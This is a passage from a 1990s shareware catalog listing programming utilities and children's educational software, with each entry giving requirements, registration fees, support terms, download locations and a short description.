editor/word processor. See full description + on page 185. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 185. + + Product: Builder + Clipper application generator. See full description on + page 256. + + Product: Examine + Fast text search utility for Windows. See full description on + page 14. + + Chapter 12, "Computer programming" 435 + + + + Product: Helpgen + Windows help file generator - authoring tool. See full + description on page 436. + + Product: NewBase + Author: , 403-778-5028 + Version: 1.0 (03-15-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $25.00 + Registration benefits: 4 months of phone, CompuServe, GEnie, mail + support; 4-month limited return policy; all ASP-wide offers + (see page 5); discounts on other products. 4-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: NEWBASE.ZIP on BBSs; NBASE.ZIP on CompuServe in + CIS:PCPROG forum LIBrary 6 (or contact userID 70473,57 for + assistance); NEWBASE.ZIP on GEnie in IBMPC forum LIBrary 15 (or + contact userID G.MANWEILER for assistance). + Download size: 227k (about 17 minutes with a 2400 baud modem) + Description: + Calculates integer bases in hexadecimal, decimal, octal, and + binary. Displays the full ascii character set. Returns the scan + code of function key and function key combinations. Codes + attribute bytes and displays the value in hex, decimal, and + octal. Has a 6 month calendar, DOS command line and DOS shell, + color scheme and mouse speed selection. Has a hpertext based + help and tutorial system. + + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 248. + + Product: RUF100.ZIP + Reuseable functions for Visual Basic. See full description on + page 412. + + Product: SLIB10.ZIP + Author: , 404-594-7500 + Version: 1.0 (03-31-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; VGA + monitor; Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: HP LaserJet printer; XMS memory. + Registration fee: $10.00 (add $2.50 for shipping to U.S. + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; 3-month return + + Chapter 12, "Computer programming" 436 + + + + policy; royalty-free runtime license; site license; all ASP- + wide offers (see page 5). 3-month free upgrading allowed. + Look for: SLIB10.ZIP on BBSs; SLIB10.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 75350,205 for + assistance). + SWREG#: 5263 + Download size: 620k (about 46 minutes with a 2400 baud modem) + Description: + A Windows utility to store excerpts of source code in a + database for easy retrieval. Code may be copied to the + clipboard, printed or edited. A search function is also + provided. Fully functional. + + + 12.9.2 `Help' utilities + + Product: DeskTop Advisor(R) + Create/browse popup hypertext w/images, sound. See full + description on page 424. + + Product: Helpgen + Author: , 208-772-9347 + Version: 1.20 (09-06-94) + Needs: IBM 80386, Windows 3.1 or better. 150k RAM. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $30.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited CompuServe, + mail support; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: availability unknown on BBSs; HPGN12.ZIP on CompuServe + in CIS:PCPROG forum LIBrary 6 (or contact userID 71211,70 for + assistance). + SWREG#: 3462 + Download size: 198k (about 15 minutes with a 2400 baud modem) + Description: + Create attractive Windows help files for your programs without + using an expensive word processor. Uses an easy-to-learn macro + language to take the pain out of creating your help files. + Includes full RTF language support through the macro language + and/or RTF commands. Makes it easy to create and test help + files. A help file tutorial is also included. + + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 192. + + + 12.10 Software tools & add-ins + + See also: Database applications, Software tools & add-ins. + + Chapter 12, "Computer programming" 437 + + + + 12.10.1 For multiple programs + + Product: Content Label Rating + Software Rating System. See full description on page 643. + + Product: SLIB10.ZIP + Source code librarian utility. See full description on + page 435. + + Product: TextPad 16 + TextPad 1.30: 16-Bit Text Editor. See full description on + page 190. + + Product: TextPad 32 + TextPad 1.30: 32-Bit Text Editor. See full description on + page 190. + + 12.10.2 For other + + Product: 4Print/4Book DOS + Paper saving utility for LaserJets & DeskJets. See full + description on page 89. + + Product: 4Print/4Book Windows + 4Print/4Book DOS + 4PrinW Windows interface. See full + description on page 89. + + Product: Ahelp Clipper Help Library + Author: , 216-659-9489 + Version: 1.43 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 16k RAM. Clipper. + Strongly recommended: Hard disk; Mouse. + Registration fee: $95.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; royalty-free source code; LAN + license; site license; bonus utilities; all ASP-wide offers + (see page 5); disks of other shareware; discounts on other + products. 1-month free upgrading allowed. + Look for: AHP143.ZIP on BBSs (call 216-661-9065 to download it at + no charge); AHP143.ZIP on CompuServe in CIS:CLIPPER forum + LIBrary 0 (or contact userID 73057,3113 for assistance); + AHP143.ZIP on GEnie in CLIPPER forum LIBrary 0. + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Create fully index and context sensitive help screens. The + programmer can optionally let users add/update help text. Help + windows pop up when user presses help key for a specific topic + or users can search help topic index for information. + + Chapter 12, "Computer programming" 438 + + + + Product: AsciiConvert + Comma-delimited ASCII text converter. See full description on + page 50. + + Product: Btr Help! + Author: , 202-675-4528 + Version: 1.88 (06-15-91) + Needs: IBM PC, DOS 3.0 or better. BTRIEVE.EXE or BREQUEST.EXE. + Registration fee: $40.00 + Registration benefits: Printed Manual with disk; One year of + Phone/FAX/Mail/Email/BBS support; Bonus Disk of Btrieve + Utilities; Btrieve "C" Library with full source; Certificate + for Free CompuServe Membership; Certificate for $7 off a + subscription to Shareware Magazine. + Look for: BTRHLP??.ZIP on BBSs (call 301-596-1180 to download it + at no charge); BHLP??.ZIP on CompuServe in CIS:NOVA forum + LIBrary 14 (or contact userID 74777,3004 for assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + Provides the functions needed for the design, development and + maintenance of applications using Btrieve. It's great for file + maintenance with: Great Plains Accounting, IBM's Platinum + Series, Pacioli 2000 Accounting, Galacticomm BBS, Macola + Accounting, Xtrieve, Magic PC DBMS, DacEasy Accounting or any + application that uses Btrieve. It provides an easy way to + repair damaged Btrieve database files or test their integrity. + Browse and edit records in many different formats - and much + more! + + + Product: Btr Watch + Memory resident Btrieve debugger. See full description on + page 257. + + Product: MouseTools + Author: + Version: 1.0 (09-13-89) + Needs: IBM PC, DOS 2.1 or better. Turbo Pascal. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; royalty-free source + code; + Look for: MOUSTL55.ZIP on BBSs (call 508-788-6951 to download it + at no charge). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Provides a set of mouse interface routines for Turbo Pascal + programmers. Included are low level routines for positioning + and moving mouse cursors as well as higher level routines for + selecting files, multiple choice questions, etc. + + Chapter 12, "Computer programming" 439 + + + + Product: Playground + Tool for building object models. See full description on + page 399. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 43. + + Product: TURBO TPU TOOLKIT! + Author: + Version: 1.5 (03-01-94) + Needs: IBM AT (80286), DOS 3.3 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + EGA monitor; math coprocessor. Turbo Pascal v5.5 or later. + Registration fee: $100.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of phone, CompuServe, mail support; 6-month limited + return policy; all ASP-wide offers (see page 5); discounts on + upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; TTT1.ZIP on CompuServe in + CIS:LIBRARY forum LIBrary 0 (multiple files) (or contact userID + 73353,121 for assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A math library for Turbo Pascal programmers. Engineers and + scientists will get features like hyperbolics, inverse trig, + factorials, primes, matrix math, eigenvalues/vectors, nxn + determinants, matrix multiplication, matrix inversion and + multiple regression. Engineering unit conversions for force, + power, volume, heat, work, viscosity, mass/molar flux, heat- + transfer coefficients and much, much more! Comes with a manual + explaining all the functions. + + Chapter 13, "Education" 440 + + + + + + Chapter 13 + Education + + See also: Writing applications, Bibliography. + + + 13.1 Preschool + + Product: Animated Alphabet + Author: + Version: 1.0 (04-12-90) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $8.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus utilities; bonus graphics; all ASP-wide + offers (see page 5). Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: ALPHA10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); ALPHA1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 452k (about 34 minutes with a 2400 baud modem) + Description: + When the child matches the correct letter of the alphabet to + the picture, the picture becomes animated in an amusing way. + Winner of Shareware Industry Award for "Best Educational + Software". + + + Product: Animated Bugs + Author: + Version: 1.0 (09-07-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; VGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $12.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: ABUGS10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); ABUG1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 1184k (about 88 minutes with a 2400 baud modem) + Description: + A board game for young children that is full of color (256 of + them), sound (effects and voice) and animation. Garden + backgrounds, mini-animtions, and full-screen animtions are + featured. Two players can play the game (one or both can be the + + Chapter 13, "Education" 441 + + + + PC). Movement is determined by a spinner that can be either + numbers, colors or shapes. From FLIX Productions, winner of + both the Shareware Industry Award and Ziff Davis Shareware + Award. + + + Product: Animated Shapes + Author: + Version: 1.0 (09-25-90) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $8.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: SHAPES10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); SHAPE1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 267k (about 20 minutes with a 2400 baud modem) + Description: + Children learn shapes and colors with animation. When the + shapes and colors of a geometrical object are correctly + identified, the object is used to build a picture. Guessing + what the picture will be is part of the fun. Once the picture + is completed, it turns into a movie-like animation. Winner of + the Shareware Industry Award for "Best Educational Software". + + + Product: Brandon's Big Lunchbox + Author: , 713-463-7452 + Version: 1.75 (09-17-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $25.00 (add $3.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + CompuServe, mail support; bonus graphics. + Look for: BIGBOX.ZIP on BBSs; BIGBOX.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 71336,336 for + assistance); BIGBOX.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID JEROBICHAUX for assistance). + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + 26 colorful educational games that will keep young computer + users busy for hours! Open the Lunchbox and your computer + users will have loads of fun learning computer skills, problem + solving, drilling on sight words, solving fun math problems, + playing memory games, learning the alphabet, plus much more. + Pick every game from the main Lunchbox menu. Keep the word + games fresh - customize your word list! + + Chapter 13, "Education" 442 + + + + Product: Brandon's Preschool Graphics Lu + Author: , 713-463-7452 + Version: 1.0 (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $10.00 (add $3.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited CompuServe, + mail support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; PREBOX.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 0 (or contact userID 71336,336 for + assistance). + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + It speaks! Bright VGA graphics and Soundblaster/PC speaker + support, the Preschool Lunchbox uses human voice to drill + preschoolers in three different number games. Colorful + rewards, including guitar riffs (recorded on a series of + vintage electric guitars and pumped through vintage Marshall + and Fender amps) ranging from jazzy splits to wailing shreds. + This is volume 1 of a 4 volume set + + + Product: Card Flash + Card flash. See full description on page 455. + + Product: Color Fun + Author: , 312-922-6313 + Version: 1.0 (05-06-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor; sound card. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, + GEnie, mail support; all ASP-wide offers (see page 5); + discounts on other products; discounts on upgrades. Lifetime + free upgrading allowed. + Look for: COLFUN10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); COLFU*.ZIP on CompuServe in ZNT:PBSHOM forum + LIBrary 1 (or contact userID 71532,3271 for assistance); + COLFUN10.ZIP on GEnie in WINDOWS forum LIBrary 20 (or contact + userID XRG36978 for assistance). + Download size: 223k (about 17 minutes with a 2400 baud modem) + Description: + A Windows educational game for children of ages 2-8. Teaches + children the basic colors and how to use computers. On-line + help. + + Chapter 13, "Education" 443 + + + + Product: EGA Mouse Paint + Electronic coloring book. See full description on page 448. + + Product: Kidproof for Windows [***] + Secure desktop for kids. See full description on page 116. + + Product: Mouse Math + A whimsical verbal math drill program. See full description on + page 467. + + Product: Teach Your Children + Helps kids have fun learning math and reading. See full + description on page 452. + + Product: Z & Z Color + Author: , 410-561-3891 + Version: 3.1 (09-01-95) + Needs: IBM PC, Windows 3.0 or better. 2000k RAM; Hard disk; + Mouse. + Strongly recommended: sound card. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of unlimited phone, CompuServe, mail support; bonus + data; bonus graphics; all ASP-wide offers (see page 5); + discounts on upgrades. 6-month free upgrading allowed. Bonus + audio files. + Look for: ZZCOLR.ZIP on BBSs; ZZCOLR.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 12 (or contact userID 76021,2256 for + assistance). + SWREG#: 1406 + PsL#: 11741 + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + Color-by-number Windows program great for age 3 and above. + Teaches colors, numbers, letters, shapes, and memory skills + while entertaining again and again. Color one of the included + pictures or create your own. Prize is awarded upon successful + completion of each drawing. Windows compatible sound board is + recommended but not required. Testimonials: "just great", + "love your program", "wonderful", "3 year old ... is doing Z & + Z Color almost every day". + + + Product: Z & Z Puzzle + Windows combination jigsaw/slider puzzle. See full description + on page 453. + + Chapter 13, "Education" 444 + + + + 13.2 Elementary + + Product: Anim. Multiplication & Division + Author: + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: AMD30.ZIP on BBSs (call 512-258-0571 to download it at + no charge); AMD30.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 524k (about 39 minutes with a 2400 baud modem) + Description: + st rd + Primarily for children from 1 through 3 grades. Based on + the multiplication tables from 1 to 10, it teaches "mental + math" in a fun way. Progressive help is given as needed. + Rewards for successful completion of ten problems include + several build-and-color you own animations (dinosaurs, cars, + face, and fashion model). From FLIX Productions - the winner of + both the Shareware Industry Award and Ziff Davis Shareware + award. + + + Product: Animated Clock + Author: + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $8.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: ACLOCK30.ZIP on BBSs (call 512-258-0571 to download it + at no charge); ACLOC3.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 321k (about 24 minutes with a 2400 baud modem) + Description: + A program for children from pre-K through third grade that + teaches important time skills involving analog and digital + clocks. Various levels and context sensitive help are provided. + Animated rewards pop out of the doors of the cuckoo clock, and + ten correct answers gets a full-screen silly cartoon. Winner of + the Shareware Industry Award for "Best Educational Software". + + Chapter 13, "Education" 445 + + + + Product: Animated Math + Author: + Version: 1.0 (02-15-91) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: AMATH10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); AMATH1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 306k (about 23 minutes with a 2400 baud modem) + Description: + Teaches counting, addition and subtraction using animation. For + children from Pre-K through first grade. Single digit problems + covered. Animated rewards are given each step of the way - not + just a "wrong" response from the computer. Rewards include + dinosaur connect-the-dots, color games, build your own rocket, + and animated piano, and more. Winner of the Shareware Industry + Award for "Best Educational Software". + + + Product: Animated Memory Game + Author: + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $6.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: AMEM30.ZIP on BBSs (call 512-258-0571 to download it at + no charge); AMEM3.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 237k (about 18 minutes with a 2400 baud modem) + Description: + Uses 30 animated sequences to test memory skills. By matching + hidden pictures in pairs you win the game and get animated + rewards. Many options are provided: selecting from 14 different + tile backgrounds, a mini-movie theater, and more. Various + difficulty levels provide challenges for all ages. Winner of + the Shareware Industry Award for "Best Educational Software". + + Chapter 13, "Education" 446 + + + + Product: Animated Money + Author: + Version: 1.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; VGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $15.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: AMON1?.ZIP on BBSs (call 512-258-0571 to download it at + no charge); AMON1*.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 1376k (about 102 minutes with a 2400 baud modem) + Description: + Teaches coin recognition and math skills using US and Canadian + coins. The coins are scanned to be highly recognizable. Three + types of games are provided: coin recognition and adjustable + level matching games (coins to amounts and coins to coins). 10 + matches earn a ticket to a movie featuring stop-motion + animation. Sound effects and speech supported for virtually all + devices. From FLIX Productions, winner of both the Shareware + Industry Award and Ziff Davis Shareware Award. + + + Product: Animated VGA Memory Game + Author: + Version: 1.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM. + Strongly recommended: SVGA monitor; Hard disk; sound card. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: AMEMV10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); AMV1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 752k (about 56 minutes with a 2400 baud modem) + Description: + SVGA and sound support are provided in this version of a + concentration type game. All kinds of animation are used + including: clay, stop-motion, morphing, tweening, 3D, cell and + full-motion video. up to 640 tiles can be used in SVGA mode (10 + to 20 in VGA). One or two player mode, and a welath of other + options. Winner of Ziff Davis Shareware Award from Computer + Gaming Magazine for "Best Puzzle Game". + + Chapter 13, "Education" 447 + + + + Product: Animated Words + Author: + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $12.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: AWORDS30.ZIP on BBSs (call 512-258-0571 to download it + at no charge); AWORD3.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 680k (about 51 minutes with a 2400 baud modem) + Description: + Animated Words is a spelling program for children from pre-K + through first grade. The child is helped to match the word with + it's picture. When the word is correctly matched, pieces are + added to a puzzle; after five correct answers the puzzle + becomes animated. The program is enhanced with digitized speech + for the PC Speaker or SoundBlaster. Winner of the Shareware + Industry Award for "Best Educational Software". + + + Product: Brandon's Big Lunchbox + Educational fun for kids 3 - 7! See full description on + page 441. + + Product: Brandon's Preschool Graphics Lu + Graphics and sound, learning for preschoolers. See full + description on page 441. + + Product: Card Flash + Card flash. See full description on page 455. + + Product: Color Fun + Kids' game. See full description on page 442. + + Chapter 13, "Education" 448 + + + + Product: CULTURAL AWARENESS + Author: , 214-517-0279 + Version: 1.13 (05-04-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $20.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; 1-month return policy; bonus + data; all ASP-wide offers (see page 5); disks of other + shareware. + Look for: AWARE113.ZIP on BBSs (call 214-690-2168 to download it + at no charge). + Download size: 182k (about 14 minutes with a 2400 baud modem) + Description: + Educational game to test and improve your child's "cultural + literacy." Two levels of play. At Novice level, the game is + suitable for students sixth grade and up. At advanced level, + the game is a challenge for adults! Topics include proverbs, + idioms, grammar, children's literature, mythology, music, art, + philosophy, the Bible, world religions, American history & + geography, world history & geography, science & technology, + medicine, and mathematics. + + + Product: DOC DEFIANT + An original board game similar to Backgammon. See full + description on page 610. + + Product: EGA Mouse Paint + Author: , 714-898-7262 + Version: 5.0 (10-29-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Strongly recommended: HP LaserJet printer. + Registration fee: $18.50 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe support; bonus + utilities; discounts on other products. + Look for: EGAMP.ZIP on BBSs; EGAMP.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 11 (or contact userID 70233,1315 for assistance). + Download size: 194k (about 15 minutes with a 2400 baud modem) + Description: + If your kids like to color then they will enjoy using the mouse + to color in any of over 40 pre-made picture. There are two + pallettes of colors and patterns to select from, over 60. + Selecting a picture and coloring it in is as easy as point and + click. An additional feature is the arrow draw program which + allows you to create and color your own drawings. Also includes + talking menus for the smaller children. + + Chapter 13, "Education" 449 + + + + Product: Equatron + Beat the computer at solving the equation. See full + description on page 604. + + Product: HANG4.ZIP + 100% user configureable hangman. 256 colors! See full + description on page 629. + + Product: Kidproof for Windows [***] + Secure desktop for kids. See full description on page 116. + + Product: Math Bingo + Author: + Version: 1.1 (10-26-94) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $9.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 12 months of CompuServe, mail support; + 3-month limited return policy. + Look for: availability unknown on BBSs; MBINGO.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 14 (or contact userID 74453,2112 + for assistance). + Download size: 344k (about 26 minutes with a 2400 baud modem) + Description: + Your child will easily learn math facts while having fun + playing bingo, in an easy-to-use program which teaches math in + a non-drill way. It is geared to kids; they learn without + realizing that they are learning. Create voice overlays, and + hear yourself or your child as the patient instructor. For one + or two players. Program designer has a graduate degree in + Psychology. Included are a full on-line help, the option to + turn voices on and off, and to change the speed of the game. + + Chapter 13, "Education" 450 + + + + Product: MATH CHALLENGE + Author: , 810-348-6697 + Version: 2.0 (03-01-94) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; VGA + monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $16.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; lifetime return policy; all ASP-wide offers (see + page 5); disks of other shareware. + Look for: availability unknown on BBSs; MATHCH.EXE on CompuServe + in CIS:EDFORUM forum LIBrary 2 (or contact userID 71150,1305 + for assistance). + SWREG#: 1988 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + An educational game that encourages your children to learn + their math tables with personalized text, colorful animation, + interesting sound effects, and photographic images. Also + provides parent with options to select subject and difficulty + levels. Can be used in practice/learning or in timed testing + modes. + + + Product: MathCounts 1+2 + Author: , 604-229-4766 + Version: 1.2 (01-07-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor. + Registration fee: $29.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, mail support; discounts on + other products. + Look for: MC12V12.ZIP on BBSs (multiple files); MC1212.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 11 (or contact userID + 71431,1673 for assistance). + SWREG#: 819 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + st nd + A graphics-based 1 and 2 grade math tutorial, covers + counting, addition, subtraction, multiplication, fractions, + telling time, word problems, place value, and more. Instructive + feedback and positive reinforcement. Difficulty levels chosen + automatically or by instructor. Keeps track of student's + progress. Can be customized with friends' names in word + problems. + + Chapter 13, "Education" 451 + + + + Product: MathCounts 3+4 + Author: , 604-229-4766 + Version: 1.2 (01-07-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor. + Registration fee: $29.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, mail support; discounts on + other products. + Look for: MC34V12.ZIP on BBSs (multiple files); MC3412.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 11 (or contact userID + 71431,1673 for assistance). + SWREG#: 820 + Download size: 115k (about nine minutes with a 2400 baud modem) + Description: + rd th + A graphics-based 3 and 4 grade math tutorial, covers + addition, subtraction, multiplication, division, estimation, + fractions, decimals, word problems, and more! Instructive + feedback and positive reinforcement. Context-sensitive remedial + work, automatic beginner's mode. Keeps track of student's + progress. Can be customized. + + + Product: Melissa's Music Flashcards + Music flashcards that are fun. See full description on + page 560. + + Product: MERLIN'S MATH + Author: , 214-517-0279 + Version: 1.03 (05-04-94) + Needs: IBM AT (80286), DOS 3.0 or better. 512k RAM; VGA monitor; + Mouse. + Registration fee: $18.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; 1-month return policy; all + ASP-wide offers (see page 5); disks of other shareware. + Look for: MERLN103.ZIP on BBSs (call 214-690-2168 to download it + at no charge). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Episodes 1 & 2 teach the mechanics of multiplying multiple + digit numbers, up to 5 by 5 digits, and long division. Starting + as an apprentice magician, the student gains in power by + solving math problems of increasing difficulty, all the time + racing against a dripping water clock. Points are awarded on + the basis of speed, accuracy, and difficulty level of problem. + + Chapter 13, "Education" 452 + + + + Product: Mouse Math + A whimsical verbal math drill program. See full description on + page 467. + + Product: A MUSICAL TUTORIAL + An excellent way to promote musical study. See full + description on page 476. + + Product: A 